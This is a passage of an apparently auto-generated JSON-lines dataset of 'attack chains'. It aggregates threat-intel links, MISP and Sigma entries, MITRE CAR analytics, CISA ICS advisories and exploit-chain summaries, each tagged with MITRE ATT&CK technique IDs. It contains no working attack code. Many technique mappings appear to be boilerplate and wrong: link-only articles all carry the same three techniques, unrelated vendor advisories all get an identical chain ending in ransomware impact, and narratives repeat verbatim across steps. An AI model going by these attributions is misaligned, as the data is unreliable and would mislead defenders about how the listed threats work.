'2024-01-29'\ndescription: Manually assigned the full_access_as_app API permission to an application\n registration\nenvironment: attack_range\ndirectory: full_access_as_app_permission_assigned\nmitre_technique:\n- T1098.002\ndatasets:\n- name: full_access_as_app_permission_assigned\n path: /datasets/attack_techniques/T1098.002/full_access_as_app_permission_assigned/full_access_as_app_permission_assigned.log\n sourcetype: o365:management:activity\n source: o365\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "author: Mauricio Velazco\nid: 6cd62088-3b97-40d2-9469-769e09fbf085\ndate: '2024-01-29'\ndescription: Manually assigned the full_access_as_app API permission to an application\n registration\nenvironment: attack_range\ndirectory: full_access_as_app_permission_assigned\nmitre_technique:\n- T1098.002\ndatasets:\n- name: full_access_as_app_permission_assigned\n path: /datasets/attack_techniques/T1098.002/full_access_as_app_permission_assigned/full_access_as_app_permission_assigned.log\n sourcetype: o365:management:activity\n source: o365\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "author: Mauricio Velazco\nid: 6cd62088-3b97-40d2-9469-769e09fbf085\ndate: '2024-01-29'\ndescription: Manually assigned the full_access_as_app API permission to an application\n registration\nenvironment: attack_range\ndirectory: full_access_as_app_permission_assigned\nmitre_technique:\n- T1098.002\ndatasets:\n- name: full_access_as_app_permission_assigned\n path: /datasets/attack_techniques/T1098.002/full_access_as_app_permission_assigned/full_access_as_app_permission_assigned.log\n sourcetype: o365:management:activity\n source: o365\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/splunk/attack_data/tree/master/datasets/attack_techniques/T1098.002/full_access_as_app_permission_assigned/full_access_as_app_permission_assigned.yml", "retrieved_at": "2026-07-10T11:45:20.038833+00:00", "license": "Apache-2.0", "lang": "en"}} {"chain_id": "f4535e409af0672df8c62079d029939d", "source_id": "misp_galaxy_relations", "external_id": "4b46767d-4a61-4f30-995e-c19a75c2e536", "title": "Systemctl - T1569.003", "description": "Systemctl - T1569.003", "steps": [{"order": 1, "label": "Technique T1569", "narrative": "T1569.003 ['attack-Linux:execution'] ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Service: Service Creation'] ['Linux'] ['https://attack.mitre.org/techniques/T1569/003', 'https://www.redhat.com/en/blog/linux-systemctl-manage-services']", "mitre_attack": [{"technique_id": "T1569"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-attack-pattern.json"}]}, {"order": 2, "label": "Technique T1569.003", "narrative": "T1569.003 ['attack-Linux:execution'] ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Service: Service Creation'] ['Linux'] ['https://attack.mitre.org/techniques/T1569/003', 'https://www.redhat.com/en/blog/linux-systemctl-manage-services']", "mitre_attack": [{"technique_id": "T1569.003"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-attack-pattern.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-attack-pattern.json", "retrieved_at": "2026-07-10T11:21:40.845230+00:00", "license": "", "lang": "en"}, "actor": {"name": "Systemctl - T1569.003", "aliases": []}} {"chain_id": "3830d7ce318d4debebb99213ed36e29d", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/blog_whtaguy_com/2020_04_guys-30-reverse-engineering-tips-tricks_html/link.md", "title": "2020_04_guys-30-reverse-engineering-tips-tricks_html", "description": "2020_04_guys-30-reverse-engineering-tips-tricks_html", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://blog.whtaguy.com/2020/04/guys-30-reverse-engineering-tips-tricks.html)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://blog.whtaguy.com/2020/04/guys-30-reverse-engineering-tips-tricks.html)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://blog.whtaguy.com/2020/04/guys-30-reverse-engineering-tips-tricks.html)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/blog_whtaguy_com/2020_04_guys-30-reverse-engineering-tips-tricks_html/link.md", "retrieved_at": "2026-07-10T13:10:45.830027+00:00", "license": "", "lang": "en"}} {"chain_id": "8d892f74adcb247a6f8f67f4377ebc21", "source_id": "misp_galaxy_relations", "external_id": "6856ddd6-2df3-4379-8b87-284603c189c3", "title": "System Firmware - T1019", "description": "System Firmware - T1019", "steps": [{"order": 1, "label": "Technique T1019", "narrative": "T1019 ['attack-Windows:persistence'] ['Windows'] ['http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html', 'http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about', 'http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research', 'http://www.uefi.org/", "mitre_attack": [{"technique_id": "T1019"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-attack-pattern.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-attack-pattern.json", "retrieved_at": "2026-07-10T11:21:40.831794+00:00", "license": "", "lang": "en"}, "actor": {"name": "System Firmware - T1019", "aliases": []}} {"chain_id": "807b79f7e70717191e14d2a1c972de97", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/bleepingcomputer_com/news_security_new-arena-crysis-ransomware-variant-released/link.md", "title": "news_security_new-arena-crysis-ransomware-variant-released", "description": "news_security_new-arena-crysis-ransomware-variant-released", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/bleepingcomputer_com/news_security_new-arena-crysis-ransomware-variant-released/link.md", "retrieved_at": "2026-07-10T12:21:27.797704+00:00", "license": "", "lang": "en"}} {"chain_id": "44c5d3d2a32ce516f632d8db49e9ff26", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/blog_trendmicro_com/trendlabs-security-intelligence_coin-miner-mobile-malware-returns-hits-google-play/link.md", "title": "trendlabs-security-intelligence_coin-miner-mobile-malware-returns-hits-google-play", "description": "trendlabs-security-intelligence_coin-miner-mobile-malware-returns-hits-google-play", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/blog_trendmicro_com/trendlabs-security-intelligence_coin-miner-mobile-malware-returns-hits-google-play/link.md", "retrieved_at": "2026-07-10T13:10:33.698837+00:00", "license": "", "lang": "en"}} {"chain_id": "8c3b08226321d61d8aae97916ca3b783", "source_id": "sigma_attack_stage_tags", "external_id": "windows\\process_creation\\proc_creation_win_susp_cli_obfuscation_unicode_img.yml", "title": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image", "description": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image", "steps": [{"order": 1, "label": "Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image", "narrative": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", "mitre_attack": [{"technique_id": "T1027"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_susp_cli_obfuscation_unicode_img.yml"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_susp_cli_obfuscation_unicode_img.yml", "retrieved_at": "2026-07-10T11:38:24.940962+00:00", "license": "", "lang": "en"}} {"chain_id": "1c776ddc712221061f9698bc62e1b7a9", "source_id": "redstack_vault_chains", "external_id": "ac-stored-xss-crowdsignal-embed-media", "title": "ac-stored-xss-crowdsignal-embed-media", "description": "A multi-step attack exploiting a stored XSS vulnerability in the Embed Media feature of Crowdsignal quizzes, allowing injection of malicious JavaScript payloads that execute when users view the quiz on app.crowdsignal.com and survey.fm subdomains.", "steps": [{"order": 1, "label": "Exploit-Stored-XSS-in-Crowdsignal-Embed-Media", "narrative": "A multi-step attack exploiting a stored XSS vulnerability in the Embed Media feature of Crowdsignal quizzes, allowing injection of malicious JavaScript payloads that execute when users view the quiz on app.crowdsignal.com and survey.fm subdomains.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Stored-XSS-via-Embed-Media-in-Crowdsignal-Quizzes-Leading-to-Arbitrary-JavaScript-Execution.md", "retrieved_at": "2026-07-10T14:19:45.779705+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "2defc3bd7a82877f664863e8d11201d3", "source_id": "redstack_vault_chains", "external_id": "071310dd-8937-4451-aaed-7e1354fb2d55", "title": "071310dd-8937-4451-aaed-7e1354fb2d55", "description": "Multi-stage attack chain demonstrating HTTP Request Smuggling in Node.js by exploiting improper header parsing in the llhttp parser.", "steps": [{"order": 1, "label": "Set-Up-Node-js-HTTP-Test-Server", "narrative": "Multi-stage attack chain demonstrating HTTP Request Smuggling in Node.js by exploiting improper header parsing in the llhttp parser.", "mitre_attack": []}, {"order": 2, "label": "Send-Malformed-HTTP-Request-for-Smuggling", "narrative": "Multi-stage attack chain demonstrating HTTP Request Smuggling in Node.js by exploiting improper header parsing in the llhttp parser.", "mitre_attack": []}, {"order": 3, "label": "Observe-Server-Response-for-Vulnerability-Confirmation", "narrative": "Multi-stage attack chain demonstrating HTTP Request Smuggling in Node.js by exploiting improper header parsing in the llhttp parser.", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 4, "label": "Test-Alternative-Malformed-Payload", "narrative": "Multi-stage attack chain demonstrating HTTP Request Smuggling in Node.js by exploiting improper header parsing in the llhttp parser.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/HTTP-Request-Smuggling-in-Node-js-via-llhttp-Parser-Flaw.md", "retrieved_at": "2026-07-10T14:14:24.904406+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "ba9fb94a8c6266a85e56e0f0cc3e2822", "source_id": "mitre_car_analytics", "external_id": "CAR-2021-01-003.yaml", "title": "Clearing Windows Logs with Wevtutil", "description": "Clearing Windows Logs with Wevtutil", "steps": [{"order": 1, "label": "CAR T1070", "narrative": "---\ntitle: Clearing Windows Logs with Wevtutil\nsubmission_date: 2020/12/02\ninformation_domain: 'Host'\nplatforms:\n - Windows\nsubtypes:\n - Process\nanalytic_types:\n - TTP\ncontributors:\n - Cyware Labs\nid: CAR-2021-01-003\ndescription: |\n In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate", "mitre_attack": [{"technique_id": "T1070"}]}, {"order": 2, "label": "CAR T1070.001", "narrative": "---\ntitle: Clearing Windows Logs with Wevtutil\nsubmission_date: 2020/12/02\ninformation_domain: 'Host'\nplatforms:\n - Windows\nsubtypes:\n - Process\nanalytic_types:\n - TTP\ncontributors:\n - Cyware Labs\nid: CAR-2021-01-003\ndescription: |\n In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate", "mitre_attack": [{"technique_id": "T1070.001"}]}], "provenance": {"url": "https://github.com/mitre-attack/car/blob/master/analytics/CAR-2021-01-003.yaml", "retrieved_at": "2026-07-10T11:38:56.228020+00:00", "license": "", "lang": "en"}} {"chain_id": "d4aa274463eeb582538a5ba9d0f3549b", "source_id": "misp_galaxy_relations", "external_id": "573ad264-1371-4ae0-8482-d2673b719dba", "title": "Launch Daemon - T1543.004", "description": "Launch Daemon - T1543.004", "steps": [{"order": 1, "label": "Technique T1543", "narrative": "T1543.004 ['attack-macOS:persistence', 'attack-macOS:privilege-escalation'] ['Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Process: Process Creation', 'Service: Service Creation', 'Service: Service Modification'] ['macOS'] ['https://attack.mitre.org/techniques/T1543/004', 'https://bradleyjkemp.dev/post/launchdaemon-hijacking/', 'https://developer.apple.com/librar", "mitre_attack": [{"technique_id": "T1543"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-attack-pattern.json"}]}, {"order": 2, "label": "Technique T1543.004", "narrative": "T1543.004 ['attack-macOS:persistence', 'attack-macOS:privilege-escalation'] ['Command: Command Execution', 'File: File Creation', 'File: File Modification', 'Process: Process Creation', 'Service: Service Creation', 'Service: Service Modification'] ['macOS'] ['https://attack.mitre.org/techniques/T1543/004', 'https://bradleyjkemp.dev/post/launchdaemon-hijacking/', 'https://developer.apple.com/librar", "mitre_attack": [{"technique_id": "T1543.004"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-attack-pattern.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-attack-pattern.json", "retrieved_at": "2026-07-10T11:21:40.825737+00:00", "license": "", "lang": "en"}, "actor": {"name": "Launch Daemon - T1543.004", "aliases": []}} {"chain_id": "7e6af641bb17b58b29673ffe23a8a1c8", "source_id": "trend_micro_research", "external_id": "https://www.trendmicro.com/en_us/research/18/k/trickbots-bigger-bag-of-tricks.html", "title": "TrickBot’s Bigger Bag of Tricks", "description": "TrickBot’s Bigger Bag of Tricks", "steps": [{"order": 1, "label": "Technique T1078", "narrative": "Because of TrickBot’s modular capability, we found a newly added POS malware feature that makes it more dangerous. The new module scans for indicators if an infected computer is connected to a network that supports POS services and machines.\nMalware\nTrickBot’s Bigger Bag of Tricks\nBecause of TrickBot’s modular capability, we found a newly added POS malware feature that makes it more dangerous. The new module scans for indicators if an infected computer is connected to a network that supports POS services and machines.\nBy: Noel Anthony Llimos, Carl Maverick Pascual\nNov 21, 2018\nRead time:\n(\nwords)\nSave to Folio\nTrickBot continues to evolve as it\nadds more features\nto steal users’ credentials, the most recent development we published being the\npwgrab32 module\n. Because of TrickBot’s modular ", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 2, "label": "Technique T1204.002", "narrative": "Because of TrickBot’s modular capability, we found a newly added POS malware feature that makes it more dangerous. The new module scans for indicators if an infected computer is connected to a network that supports POS services and machines.\nMalware\nTrickBot’s Bigger Bag of Tricks\nBecause of TrickBot’s modular capability, we found a newly added POS malware feature that makes it more dangerous. The new module scans for indicators if an infected computer is connected to a network that supports POS services and machines.\nBy: Noel Anthony Llimos, Carl Maverick Pascual\nNov 21, 2018\nRead time:\n(\nwords)\nSave to Folio\nTrickBot continues to evolve as it\nadds more features\nto steal users’ credentials, the most recent development we published being the\npwgrab32 module\n. Because of TrickBot’s modular ", "mitre_attack": [{"technique_id": "T1204.002"}]}], "provenance": {"url": "https://www.trendmicro.com/en_us/research/18/k/trickbots-bigger-bag-of-tricks.html", "retrieved_at": "2026-07-09T15:11:12.686610+00:00", "license": "", "lang": "en"}} {"chain_id": "c2b52319160bce6b659628c0268e1d18", "source_id": "cisa_aa_catalog", "external_id": "ICSA-25-231-02", "title": "Siemens Mendix SAML Module", "description": "Siemens Mendix SAML Module", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Siemens Mendix SAML Module: Siemens Mendix SAML Module\nVersions V5.0 through V8 of the Desigo CC product family (Desigo CC, Desigo CC Compact, Desigo CC Connect, Cerberus DMS), as well as the Desigo CC-based SENTRON Powermanager", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Siemens Mendix SAML Module: Siemens Mendix SAML Module\nVersions V5.0 through V8 of the Desigo CC product family (Desigo CC, Desigo CC Compact, Desigo CC Connect, Cerberus DMS), as well as the Desigo CC-based SENTRON Powermanager", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Siemens Mendix SAML Module: Siemens Mendix SAML Module\nVersions V5.0 through V8 of the Desigo CC product family (Desigo CC, Desigo CC Compact, Desigo CC Connect, Cerberus DMS), as well as the Desigo CC-based SENTRON Powermanager", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Siemens Mendix SAML Module: Siemens Mendix SAML Module\nVersions V5.0 through V8 of the Desigo CC product family (Desigo CC, Desigo CC Compact, Desigo CC Connect, Cerberus DMS), as well as the Desigo CC-based SENTRON Powermanager", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Siemens Mendix SAML Module: Siemens Mendix SAML Module\nVersions V5.0 through V8 of the Desigo CC product family (Desigo CC, Desigo CC Compact, Desigo CC Connect, Cerberus DMS), as well as the Desigo CC-based SENTRON Powermanager", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-231-02", "retrieved_at": "2026-07-09T14:00:15.825889+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "cca623608fb087ee6759c748362d68e1", "source_id": "cisa_aa_catalog", "external_id": "ICSA-13-079-02", "title": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities", "description": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities: Siemens WinCC 7.0 SP3 Multiple Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Securi", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities: Siemens WinCC 7.0 SP3 Multiple Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Securi", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities: Siemens WinCC 7.0 SP3 Multiple Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Securi", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities: Siemens WinCC 7.0 SP3 Multiple Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Securi", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Siemens WinCC 7.0 SP3 Multiple Vulnerabilities: Siemens WinCC 7.0 SP3 Multiple Vulnerabilities\nAll information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Securi", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-13-079-02", "retrieved_at": "2026-07-09T14:00:15.776464+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "61c87db99a313146a3e67c5af9ef0269", "source_id": "huntress_blog", "external_id": "https://www.huntress.com/blog/what-is-a-persistent-foothold", "title": "What Is a Persistent Foothold?", "description": "What Is a Persistent Foothold?", "steps": [{"order": 1, "label": "Insistence on Persistence", "narrative": "In this blog, we'll explore our new Mac agent, what we look for and why—and where we’re heading. Learn More", "mitre_attack": [{"technique_id": "T1547"}]}], "provenance": {"url": "https://www.huntress.com/blog/what-is-a-persistent-foothold", "retrieved_at": "2026-07-09T14:07:40.358960+00:00", "license": "", "lang": "en"}} {"chain_id": "91cdb78686f711cc75c6720a4c784f86", "source_id": "misp_galaxy_relations", "external_id": "0440f60f-9056-4791-a740-8eae96eb61fa", "title": "Authorized user performs requested cyber action - PRE-T1163", "description": "Authorized user performs requested cyber action - PRE-T1163", "steps": [{"order": 1, "label": "Technique T1163", "narrative": "PRE-T1163 ['mitre-pre-attack:pre-attack:compromise'] ['https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1163']", "mitre_attack": [{"technique_id": "T1163"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-pre-attack-attack-pattern.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-pre-attack-attack-pattern.json", "retrieved_at": "2026-07-10T11:21:44.226757+00:00", "license": "", "lang": "en"}, "actor": {"name": "Authorized user performs requested cyber action - PRE-T1163", "aliases": []}} {"chain_id": "6d8f54c7f035288ea01ac372d72a8d0c", "source_id": "misp_galaxy_relations", "external_id": "992dd79f-dde8-4bb0-9085-6350ba97cfb3", "title": "New BgInfo.EXE Custom VBScript Registry Configuration", "description": "New BgInfo.EXE Custom VBScript Registry Configuration", "steps": [{"order": 1, "label": "Technique T1112", "narrative": "Nasreddine Bencherchali (Nextron Systems) 2023-08-16 ['Legitimate VBScript'] registry_set_bginfo_custom_vbscript.yml medium registry_set windows ['Internal Research', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml'] ['attack.persistence', 'attack.defense-impairment', 'attack.t1112']", "mitre_attack": [{"technique_id": "T1112"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.122109+00:00", "license": "", "lang": "en"}, "actor": {"name": "New BgInfo.EXE Custom VBScript Registry Configuration", "aliases": []}} {"chain_id": "ca7b3a5ecb53754fc160467a70c10dcb", "source_id": "sigma_attack_stage_tags", "external_id": "windows\\process_creation\\proc_creation_win_net_start_service.yml", "title": "Start Windows Service Via Net.EXE", "description": "Start Windows Service Via Net.EXE", "steps": [{"order": 1, "label": "Start Windows Service Via Net.EXE", "narrative": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", "mitre_attack": [{"technique_id": "T1569.002"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_net_start_service.yml"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_net_start_service.yml", "retrieved_at": "2026-07-10T11:38:23.696923+00:00", "license": "", "lang": "en"}} {"chain_id": "3d59537d6bb3dcf0792577aa760bf584", "source_id": "cisa_aa_catalog", "external_id": "ICSA-20-154-04", "title": "ABB Central Licensing System", "description": "ABB Central Licensing System", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "ABB Central Licensing System: ABB Central Licensing System\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: ce", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "ABB Central Licensing System: ABB Central Licensing System\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: ce", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "ABB Central Licensing System: ABB Central Licensing System\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: ce", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "ABB Central Licensing System: ABB Central Licensing System\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: ce", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "ABB Central Licensing System: ABB Central Licensing System\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: ce", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-20-154-04", "retrieved_at": "2026-07-09T14:00:15.791765+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "0e9b9729ea553942eba32b12a62407b1", "source_id": "redstack_vault_chains", "external_id": "8f60c2b6-4239-46cd-aac0-470c2db6472d", "title": "8f60c2b6-4239-46cd-aac0-470c2db6472d", "description": "A single-stage attack exploiting a reflected XSS vulnerability in Swagger UI to execute arbitrary JavaScript in the victim's browser, potentially leading to session hijacking or data theft.", "steps": [{"order": 1, "label": "Exploit-Reflected-XSS-in-Swagger-UI", "narrative": "A single-stage attack exploiting a reflected XSS vulnerability in Swagger UI to execute arbitrary JavaScript in the victim's browser, potentially leading to session hijacking or data theft.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Reflected-XSS-via-Swagger-UI-for-JavaScript-Execution.md", "retrieved_at": "2026-07-10T14:17:40.447512+00:00", "license": "MIT", "lang": "en"}}